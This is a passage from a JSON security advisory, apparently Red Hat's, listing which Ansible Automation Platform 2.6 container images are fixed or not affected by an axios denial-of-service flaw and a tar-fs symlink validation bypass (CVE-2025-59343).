"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "axios: Axios DoS via lack of data size check"
},
{
"cve": "CVE-2025-59343",
"cwe": {
"id": "CWE-61",
"name": "UNIX Symbolic Link (Symlink) Following"
},
"discovery_date": "2025-09-24T18:01:19.612438+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:69d9574df2c7d58e17db96bb3f1f6fbef45b8756dc311cefbb11eac1c5687623_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:7ac4a5aa9f4aedf07af022fe3592df0e4ae972796c3d228f54036d40f07cfe25_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:ea1c58c4940001e56a3ad0f5f716605c52adfbc0e36c84ed4ecfe54af9362743_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:142125ce7f176ce4d9755f3124714bbfd8e10a687378988761d5451bd135ca76_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9adedee87c7a2cbbb28ed5a3b5f17b9c7cfeb5ee4ff8df793aeb4a4f3794ac3f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:a13732636405962dcbb3d6f6e50e9dedfaae2ff7b1a5b3c0325b2562ae5dd109_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:ade01460c7010d882979bc2b8c97c92bb6fe0c606d6dd2c131686ebf20d90b50_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:15d2b3d290e15d375ac40ec0c47f00de2a4b3e2f0dc8aa081e135a70eae72338_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:5b48bdddf275aaa65dcdc7f478baa6ee7508bb7702a2995c53a05c569afa9841_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:73b2178a84f953a63c8cbcee481b6911e193f77a7df1b17ad53a11df5409f184_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:afa286d0c0332f681e5b25160cefaaca86947efe3121bad7f9ef5c41d6e5dede_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3a2cbe7ab27580512cf973c81ebde3fa03f74e30c1820f4878bafce5f17bdb20_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:54f4749f9b9685fd9e9e87522d64f2078dde65f196b6829cbe4ad6f64005376d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6e90b9356d0b0471e01e990081f98fff57a2bb4c3d3b6558ddca32d66f5146e3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:7ebac59134bc4c91ce9230c9f44123b480a959dff54ca374699cfbfb9bfcb8a6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21485ddd8b92241b280978969d1567f1c4b9a8847dca5eb582dde5c3b83ce1c5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:4609656d13e0608036b64764997d727bd182fdd5b46f55da45983cb94bf6d56e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:a952ec77f30441e9d8567939d3ddf44a18723d411a3f0f9bacce4dc53db55721_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:da80b80f58c5b252fad5c8c8a7737a73672be5dfda3727d9dae867192a1992ca_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:10953fb6eb77149c5449f19b712dc47f9a699cff1662b1fab80b10e95e59d7eb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:1c81563472c472228365a0b75d39020bdc526fef589d83c076c021be9bca07d4_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:67f54bafa057771cae48c96f6daf49c74606c805b7783d47765b7ae0fee06fdb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:caf6663c6815dd74306ca316f3b748982c5550c15abfae19bf083cdbdc301ec8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:288219fd88218e8a99533937b1abda0211a1294ce0aa71dfb8d98fb4ac298864_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:62628bcd333089ef22600473ddf6b5acee70e1c2bbf5f1c2983e21665633a974_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:6c45d9dc22e02c136e8f1903430e85f1add5c3d66233ec0af560e4851a5aa0cd_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:a5eaaaf93a768fc5654a33a7612735697de4af3a7cf15533aeb3fbd6d2ef735f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:102451cf6511b1f59847011f2294bfbb03988e05c5252f0061d5d59e2e366ab7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:4ed0fc6b0218e1bbefb20b824680570d987975e4637b4b8bf309f1043f50ac42_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:b0d2c4a8c1f06afe52ab0b1eff3ab2e782481982edb708f3996b6ae380523ccc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:cdff41f6d52d8d2190178ad267f67054dacd9f77afff99f25b16fb24a8031236_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:09bdd457cf53397c33a08cfa248c9a88a53677650e8403c7cf8fb71a8c8fe1ce_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:780cf2fc697936935144ea82dbe6e8a420a100574cb5da06c6083181a89a3fd7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:9301963c347cc3f67a7ff06658a938a0d2abcd810fffb1b468ac467b6bf07531_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:b6a9267895ec71a6920e44fe43a595a7861476ac7ff0ad44c79841e02070323d_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:8469d45c44fb42b40596a37088a406b89a199a5298ce9c9c527b2448757aca76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:960ff4c01e0051b1de0f9985d5e92c35ce21c13545aecadf9c412c5895f2c77a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cc9bda507e8846425484938651d5a1a3fff17e8573434dfcec8a261fb68d7f11_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:cf18d22b6a2b25a236b960ab4f474cad8439dfd48b3da1d7f5cfdb49457c6717_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:08f6497b7039fdf75880aa6e6b76ed85101d6767a5123e0762edaf1d66aa619d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3398c37307e6ba2dcc592e125f1abf194db50c2d29df2ef2647cb297ff7bfe7e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:360722ce74ffd759973fa3f15e30803f0ffb261e27d5c5546d5a485f424996ad_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:3e8a9664a261f1973bf768b2392553bb11d5c9a09f0631ce1537130b7fb67e86_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:4e7f88967319f7410fb6826406bb175c1a4410a049918e6c3f7548083ac1f83e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:6dc7f5723548675e39283b90cc6345b23ec4cc3db57224c9bb5732ccd51a681c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:c7fbe8aa9424816bde8e61591968d75b9436aadc33348338a21bcb19e54f585f_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:caa6bd6fa78d5d29e620a9b89e22f07b9fbe7c9793b55ebf0cdfb969cc91dc68_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:1bbb8bdf4e4245579b74a0c8a80bf85849866a286b91f053292f48a08f65d80d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:3d0853b4f0b9fb4fac9d57a18873b3b4c9a267da5a469b3bee7a5cd32c9c4b40_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:40c9b33e0165a6acf554ebea49486ab235b26600554ae14d370a2f0476105803_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:fbad0fd8701a969937246e948928c63e644748c8e2e0ce5203032957741a2e84_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:86539e1f8ad1d2ade220ebab8e80ffdda740a3a29ac51e27f7febca1dc412bae_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:99ac77ccc235297459f77ea620429d42bb0a8dd26fd41d334cc53a396232e3a3_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:aa0bfc3af0659b2c5cddfde7f7d194b05749ba517e22e131f54ab18759f2c046_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:fcbebd780563758a09022a38fbaf6d3d4b8f90a362d40c8e48020b78b81e348b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:0942386e5c666874d6a7680724651e595847de30c23260494596ffa946eb960f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:82f9a6a71433d512d3139962ac400de9a99e5a8509dd12967bc946b8efd2b262_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a816effc6382edc76b2d1ff777c109f7c5f6de9c3d15125f66106b64b5544f37_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:dd48ee4c2bfbd685a288931bcba731b7324e33cd66b5ff57b1dbec1b0c0662b8_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:0957ac2b026c05796bd1bb066559d47fbd4fe70554acaa31a55f40863f4bf345_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:3e090bc1d88a6deb3db462ea36e9e98ab5f973d50e063d37a01fa423d4cb3c5d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c5dbef2ff58cb287a63acbadfd1bcfc12f8938f000aa7d05ac3bc9d8ccc7a062_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:c948573a88c6a6c752e8c051d9753a761d773231c46940de624397b20dc5176b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:05af0b67c8222faff9e85e80a397d81d4ceb0f99f5cbc261362080dd43db7409_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1609aa26aaf411f44a388546cacbb6c3c41cd2cc129c03cdb89d2ef8570b0407_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:1e7f99a462dc2643327f33fcf54539798628c869c59974475ff1eccf60f04cdb_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f0e755a03078917a3add8bed575aa2d4f19bbc1c16069485cf59a2fff5fedad6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:941b3a0d97b863362a6ff3abdde6071e9b450301a46d67dfe7c1a6172bbecd6a_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:dae29680daff4810413849c1458c08d1d2bb6a07074cbd4c1eccacd109b9374c_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2397901"
}
],
"notes": [
{
"category": "description",
"text": "tar-fs provides filesystem bindings for tar-stream. Versions prior to 3.1.1, 2.1.3, and 1.16.5 are vulnerable to symlink validation bypass if the destination directory is predictable with a specific tarball. This issue has been patched in version 3.1.1, 2.1.4, and 1.16.6. A workaround involves using the ignore option on non files/directories.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "tar-fs: tar-fs symlink validation bypass",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3dce912c04e50532020ef82da326f495f9a191a834c393081d6b3d2a9247f986_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:4cd246efb45ed57287e2b1178e464d0ab7fe54383283890cf36651b8a964d98d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:8c0b63347f0d33f362b47d18f234b708ff793fe9ba742184b9cf8338ab708ba5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:d60af60b04d91d194a4bbef011514bb568b04afe408615f967ea354bf9d99770_amd64"
],
"known_not_affected": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6234df5349999e20be07aa3c38010a3a65be0ee046773d1bca3514e208f3cf78_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:83d86c80c569a9f31196747e15d264bfc251a6674838bb6429a287d32a787459_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:c2df702889d1107e0e3af4af521e7a4e5f95e903e86841f1aa358c8dab9c60a1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:cc7e50863e30c9d063e2a565d0c458731213d1207e350c7806f43034a858ae5b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:815e697ac53fe170190a0d0cb7b97850b0d82e5e2922d3d26cb915c657cf1580_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:8fd2d13811182cef881debf6be72511b3c1bec13419b06227992870e4f73b08e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:aacbd0924a893df085378cfe45a33b2ad7decf5d73ef92ee23c9781186736438_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:cc22ae64354f0e0339b863bd9e24f03bd94a55ae29361ddc7be944a713b66766_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:533594cf53838ba60378f8e20fab01b26bf154219fcac7086aba05efbb0f2e5f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:58aecbcbd1ed707cceb107eae0c11c048c1840fcc5be1eae9172ab9a367e5a5d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8c94a0beee5e82d7de3ab1f25b4c9d9419d04f8be965896f1ed8e12e00a1c4c9_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e777c309cb46685326bf61f6cb617e8f05b5f135fd3579f3fc403a8eef902246_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:080a2749d8f069a561915ba788999a6d9a0d4641df282cf62168e63414ca0098_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:bb921be10afe800a9670670965b9df554fc03fc32d6d6619a4d2f0e80f9c32dd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:c50352c97aeccabaa290f9a33436b59c83d0fabe9047585ed7dbd1f2e02976e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:e2e6a5db64da900bb1f004f2beabd3bd578aa43a5d69051ee774918ab8d8950e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:0dc1770990eb18e29e4b5d0d6e31f76ea98b9bc553b4af38ba2fa419b260836b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:4a00012fedf458afc04d5a2c010027d3e482d9dabcb82f55d4cb479473f9d2d6_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:703c8aa650afe52683e2d15e7f6fdfbd8fc9c4e35122fe0ef551bbc14b4675c1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:89dea5d275fba916d2d988ee6b5420ac3d0e198ec0195cdf5db818f7331eaea4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:06aa0cc29ecfe0adac0b42a4a3d8a73641d2d222e3d882af86f31b547223444d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9513550a50f14bd48a45cbd2f493e79bd9b4416efb035d62699e176906c2a70e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:d34a73ba2e35682b4090373682112b5b15a232e217a13717a5dbe30ad6e0d524_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:ee7252d8265f1530bb9ad5908f9b292d348275cdb3552306f9831eb8ad3c577f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:01b7617033de7cf8a24b35a098abd34185605ab879dba4f1bb5af5777d5060c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:5195a7de6c4496dc134aac3095981534ccb352bd542c728a5d8bc86e87d5f681_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:ac4600c8d66becc731d588b718d0e6651abcd4aedea4bfac384e52266542a129_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:be9b91c9336638bfadfd88f9da08f3f343879a7d2023dd79952be9ab6882be09_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:1299a3e187dff4f23c8170e488bf5ecddd82b1de80126f4c2c919069b011f100_s390x",
